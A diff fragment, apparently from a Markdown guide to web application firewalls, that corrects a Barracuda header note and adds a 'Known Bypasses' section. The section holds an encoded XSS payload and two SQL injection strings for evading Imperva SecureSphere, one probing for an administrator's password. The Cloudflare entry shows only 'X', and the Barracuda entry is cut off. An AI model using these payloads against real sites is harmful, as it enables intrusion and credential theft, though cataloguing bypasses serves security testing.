Response cookies may contain barra_counter_session value.
-
Response headers may contain barracude_ keyword.
+
Response headers may contain barracuda_ keyword.
@@ -1443,6 +1443,119 @@ __Drawbacks:__
## Google Dorks Approach:
+## Known Bypasses:
+- __Cloudflare__ - Cross Site Scripting _([Source](https://waf.ninja/review-wafninja/))_
+```
+X
+```
+
+- __Imperva SecureSphere__
+* Cross Site Scripting _([Source](https://waf.ninja/review-wafninja/))_
+```
+%3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D%22prom%5Cu0070t%2526%2523x28%3B%2526%2523x27%3B%2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B%2526%2523x27%3B%2526%2523x29%3B%22%3E
+```
+* SQL Injection _([Source 1](https://www.exploit-db.com/exploits/35729), [Source 2](https://www.exploit-db.com/exploits/28854))_
+```
+15 and '1'=(SELECT '1' FROM dual) and '0having'='0having'
+stringindatasetchoosen%%' and 1 = any (select 1 from SECURE.CONF_SECURE_MEMBERS where FULL_NAME like '%%dministrator' and rownum<=1 and PASSWORD like '0%') and '1%%'='1
+```
+
+- __Barracuda__
+- Cross Site Scripting _([Source](https://waf.ninja/review-wafninja/))_
+```
+
+